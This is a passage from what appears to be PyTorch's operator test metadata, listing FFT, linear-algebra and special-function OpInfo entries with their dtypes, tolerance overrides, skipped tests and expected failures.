(torch.half,)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, check_batched_gradgrad=False, decorators=[ precisionOverride({torch.float: 1e-4}), ],), SpectralFuncInfo('fft.ifft', aten_name='fft_ifft', ref=np.fft.ifft, ndimensional=SpectralFuncType.OneD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)),), SpectralFuncInfo('fft.ifft2', aten_name='fft_ifft2', ref=np.fft.ifft2, ndimensional=SpectralFuncType.TwoD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.ifftn', aten_name='fft_ifftn', ref=np.fft.ifftn, ndimensional=SpectralFuncType.ND, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.ihfft', aten_name='fft_ihfft', ref=np.fft.ihfft, ndimensional=SpectralFuncType.OneD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), skips=( ), check_batched_grad=False), SpectralFuncInfo('fft.ihfft2', aten_name='fft_ihfft2', ref=scipy.fft.ihfftn if has_scipy_fft else None, ndimensional=SpectralFuncType.TwoD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), check_batched_grad=False, check_batched_gradgrad=False, decorators=( # The values for attribute 'shape' do not match: torch.Size([5, 6, 5]) != torch.Size([5, 6, 6]). DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), DecorateInfo(precisionOverride({torch.float: 2e-4}), 'TestFFT', 'test_reference_nd'), # Mismatched elements! 
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'))), SpectralFuncInfo('fft.ihfftn', aten_name='fft_ihfftn', ref=scipy.fft.ihfftn if has_scipy_fft else None, ndimensional=SpectralFuncType.ND, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), check_batched_grad=False, check_batched_gradgrad=False, decorators=[ # The values for attribute 'shape' do not match: torch.Size([5, 6, 5]) != torch.Size([5, 6, 6]). DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # Mismatched elements! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo( precisionOverride({torch.float: 2e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.irfft', aten_name='fft_irfft', ref=np.fft.irfft, ndimensional=SpectralFuncType.OneD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), check_batched_gradgrad=False), SpectralFuncInfo('fft.irfft2', aten_name='fft_irfft2', ref=np.fft.irfft2, ndimensional=SpectralFuncType.TwoD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.irfftn', aten_name='fft_irfftn', ref=np.fft.irfftn, ndimensional=SpectralFuncType.ND, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), OpInfo('fft.fftshift', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=sample_inputs_fftshift, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('fft.ifftshift', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=sample_inputs_fftshift, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('stft', decorators=[ skipCPUIfNoFFT, DecorateInfo(unittest.skip("Skipped!
stft does not match the native function"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ], dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_stft, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_out=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, ), OpInfo('istft', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_istft, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_out=False, decorators=( DecorateInfo(unittest.skip("Skipped! istft does not match the native function"), 'TestJit', 'test_variant_consistency_jit'), ), skips=( skipCPUIfNoFFT, # gradcheck fails on ROCm (gh-68429) # grad is computed improperly (probably for weights tensor) DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_grad'), )), UnaryUfuncInfo('floor', ref=np.floor, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), OpInfo('flip', op=torch.flip, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_flip, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('fliplr', op=torch.fliplr, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_fliplr_flipud, error_inputs_func=error_inputs_fliplr, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('flipud', op=torch.flipud, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_fliplr_flipud, error_inputs_func=error_inputs_flipud, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('sparse.sampled_addmm', dtypes=floating_and_complex_types(), supports_autograd=True, sample_inputs_func=sample_inputs_sparse_sampled_addmm, decorators=[ skipCUDAIf(_get_torch_cuda_version() < (11, 3), "cusparseSDDMM was added in 11.2.1"), skipCPUIfNoMklSparse, ], skips=( # NotImplementedError: Tensors of type SparseCsrTensorImpl do not have is_contiguous DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # RuntimeError: Sparse CSR tensors do not have strides. 
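# Illustrative repro of the error above (a sketch, assuming a CSR-capable build):
# >>> t = torch.tensor([[0., 1.], [2., 0.]]).to_sparse_csr()
# >>> t.stride()
# RuntimeError: Sparse CSR tensors do not have strides
# Most generic OpInfo tests query strides/contiguity on inputs and outputs,
# hence the blanket skips below until they learn to handle sparse layouts.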
DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'), # RuntimeError: sampled_addmm: Expected result to have sparse csr layout, but got Strided DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out_warning'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestCompositeCompliance', 'test_operator'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestCompositeCompliance', 'test_backward'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # RuntimeError: unsupported memory format option Preserve DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), )), UnaryUfuncInfo('i0', ref=np_unary_ufunc_integer_promotion_wrapper( scipy.special.i0) if TEST_SCIPY else _NOTHING, aliases=('special.i0',), decorators=(precisionOverride({torch.bfloat16: 3e-1, torch.float16: 5e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), backward_dtypes=floating_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_i0_i1, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.int8,)), )), UnaryUfuncInfo('special.i0e', aten_name='special_i0e', ref=scipy.special.i0e if TEST_SCIPY else _NOTHING, decorators=(precisionOverride({torch.bfloat16: 3e-1, torch.float16: 3e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), backward_dtypes=floating_types(), sample_inputs_func=sample_inputs_i0_i1, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.i1', aten_name='special_i1', ref=np_unary_ufunc_integer_promotion_wrapper(scipy.special.i1) if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool), dtypesIfCUDA=all_types_and(torch.bool), sample_inputs_func=sample_inputs_i0_i1, decorators=( DecorateInfo(toleranceOverride({ torch.float32: tol(atol=1e-4, rtol=0), torch.bool: tol(atol=1e-4, rtol=0)})), ), skips=( DecorateInfo(unittest.skip("Incorrect result!"), 'TestUnaryUfuncs', 
'test_reference_numerics_large', dtypes=(torch.int8,)), ), supports_fwgrad_bwgrad=True, supports_forward_ad=True), UnaryUfuncInfo('special.i1e', aten_name='special_i1e', ref=scipy.special.i1e if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool), dtypesIfCUDA=all_types_and(torch.bool), sample_inputs_func=sample_inputs_i0_i1, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.ndtr', aten_name='special_ndtr', decorators=(precisionOverride({torch.bfloat16: 5e-3, torch.float16: 5e-4}),), ref=scipy.special.ndtr if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.bfloat16, torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Dispatch stub: unsupported device typemeta DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', device_type='meta'), )), BinaryUfuncInfo('floor_divide', ref=_floor_divide_np, dtypes=all_types_and(torch.half, torch.bfloat16), supports_autograd=False, rhs_make_tensor_kwargs=dict(exclude_zero=True), supports_two_python_scalars=True, skips=( # AssertionError: Results of original model and exported/imported version of model differed DecorateInfo(unittest.skip('Skipped!'), 'TestJit', 'test_variant_consistency_jit'), # bfloat16 floor_divide compared with a float32 reference works inconsistently DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs', dtypes=(torch.bfloat16,)), # int8 floor divide has different results for -128 // -1 vs. NumPy DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.int8,)), # The following tests fail on some jobs DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values', dtypes=(torch.float16,)), )), UnaryUfuncInfo('frexp', op=torch.frexp, ref=np.frexp, dtypes=floating_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), # skip testing torch.frexp as it is not supported by ROCm platform yet decorators=[], supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # skip the tests below as torch.frexp returns tuple-like (mantissa, exponent) outputs, # while these tests currently require the output to be a single tensor. DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_batch_vs_slicing'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_contig_vs_every_other'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_contig_vs_transposed'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_non_contig_expand'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_variant_consistency'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_out_arg_all_dtypes'), # skip test_reference_numerics due to an error in Windows CI.
# np.frexp returns the exponent as np.intc dtype on the Windows platform, # and np.intc does not have a corresponding torch dtype DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=IS_WINDOWS), )), BinaryUfuncInfo('ge', ref=np.greater_equal, aliases=('greater_equal',), dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False,), OpInfo('geqrf', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_qr_geqrf, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], supports_autograd=False, skips=( # FIXME: geqrf can't forward with complex inputs that require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), )), BinaryUfuncInfo('gt', ref=np.greater, aliases=('greater',), dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False,), UnaryUfuncInfo('imag', ref=np.imag, dtypes=complex_types_and(torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 # RuntimeError: view_as_real doesn't work on unresolved conjugated tensors. check_batched_forward_grad=False, skips=( # Skip since real and imag don't have out variants. DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_out_arg_all_dtypes'), )), OpInfo('gradient', dtypes=floating_and_complex_types_and(torch.int8, torch.int16, torch.int32, torch.int64, torch.bfloat16, torch.half), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # the following tests give a runtime error with an undefined value tensor # see discussion: https://github.com/pytorch/pytorch/issues/56660 # RuntimeError: # Arguments for call are not valid. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32, torch.complex64)), # noqa: B950 DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), ), supports_inplace_autograd=False, sample_inputs_func=sample_inputs_gradient, error_inputs_func=error_inputs_gradient), OpInfo('inverse', op=torch.inverse, dtypes=floating_and_complex_types(), check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_linalg_invertible, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # Strides are not the same!
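# (The out= test checks that a preallocated `out` tensor keeps its strides;
# linalg results frequently come back Fortran-contiguous from the
# LAPACK/MAGMA backends, which likely explains the mismatch noted above.)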
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('isin', dtypes=all_types(), dtypesIfCUDA=all_types_and(torch.half), supports_autograd=False, sample_inputs_func=sample_inputs_isin), OpInfo('kthvalue', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_kthvalue, error_inputs_func=error_inputs_kthvalue), BinaryUfuncInfo('le', ref=np.less_equal, aliases=('less_equal',), dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False,), OpInfo('linalg.det', op=torch.linalg.det, aliases=('det',), dtypes=floating_and_complex_types(), backward_dtypes=floating_and_complex_types(), aten_name='linalg_det', sample_inputs_func=sample_inputs_linalg_det, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-3, rtol=1e-3)}))], check_batched_gradgrad=False, supports_inplace_autograd=False), OpInfo('linalg.det', op=torch.linalg.det, variant_test_name='singular', aliases=('det',), dtypes=double_types(), backward_dtypes=double_types(), aten_name='linalg_det', sample_inputs_func=sample_inputs_linalg_det_singular, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-3, rtol=1e-3)}))], check_batched_gradgrad=False, supports_inplace_autograd=False, skips=( # These tests started breaking after touching the SVD. DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad', device_type='cpu', dtypes=(torch.complex128,), active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), # dtypes are tested in the suite above, no need to repeat it for singular DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes'), )), OpInfo('linalg.cholesky', aten_name='linalg_cholesky', dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_cholesky, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, skips=( # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), ), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack],), OpInfo('linalg.cholesky_ex', aten_name='linalg_cholesky_ex', dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_cholesky, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, skips=( # AssertionError: Scalars are not equal!
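# (linalg.cholesky_ex returns an (L, info) pair; the out= test compares both
# outputs, and the integer `info` comparison appears to be what trips the
# scalar-equality assertion above.)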
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), ), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], ), OpInfo('linalg.cond', aten_name='linalg_cond', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_cond, check_batched_gradgrad=False, check_batched_forward_grad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off],), OpInfo('linalg.eig', aten_name='linalg_eig', op=torch.linalg.eig, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_eig, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cpu'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), # Forward-over-reverse gradgrad might be incorrect DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, with_tf32_off], ), OpInfo('linalg.eigvals', aten_name='linalg_eigvals', op=torch.linalg.eigvals, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_invertible, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), # exits early on eager extremal value test DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.eigh', aten_name='linalg_eigh', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_eigh, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, with_tf32_off], skips=( # Forward-over-reverse gradgrad might be incorrect DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=complex_types()), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 
'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.eigvalsh', aten_name='linalg_eigvalsh', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_eigh, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.householder_product', aten_name='linalg_householder_product', op=torch.linalg.householder_product, aliases=('orgqr', ), dtypes=floating_and_complex_types(), # TODO: backward uses in-place operations that vmap doesn't like check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, sample_inputs_func=sample_inputs_householder_product, decorators=[ skipCUDAIfNoCusolver, skipCPUIfNoLapack, DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-3, rtol=1e-3)})), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ]), OpInfo('linalg.ldl_factor', aten_name='linalg_ldl_factor', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_ldl_factor, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, skipCUDAIfRocm], ), OpInfo('linalg.ldl_factor_ex', aten_name='linalg_ldl_factor_ex', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_ldl_factor, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, skipCUDAIfRocm], ), OpInfo('linalg.ldl_solve', aten_name='linalg_ldl_solve', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_ldl_solve, decorators=[ skipCUDAIf(_get_torch_cuda_version() < (11, 4), "not available before CUDA 11.3.1"), skipCUDAIfNoCusolver, skipCUDAIfRocm, skipCPUIfNoLapack], ), OpInfo('linalg.lstsq', aten_name='linalg_lstsq', dtypes=floating_and_complex_types(), supports_out=True, sample_inputs_func=sample_inputs_linalg_lstsq, error_inputs_func=error_inputs_lstsq, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # we skip gradient checks for this suite as they are tested in # variant_test_name='grad_oriented' DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), # At this time ROCm uses magma instead of rocSolver, and the test passes DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward', active_if=(not TEST_WITH_ROCM)), # The values for attribute 'shape' do not match DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), 
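# (The float32 MPS skips around here mirror the ones on the other linalg
# entries above: these suites currently fail on the MPS backend for this op.)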
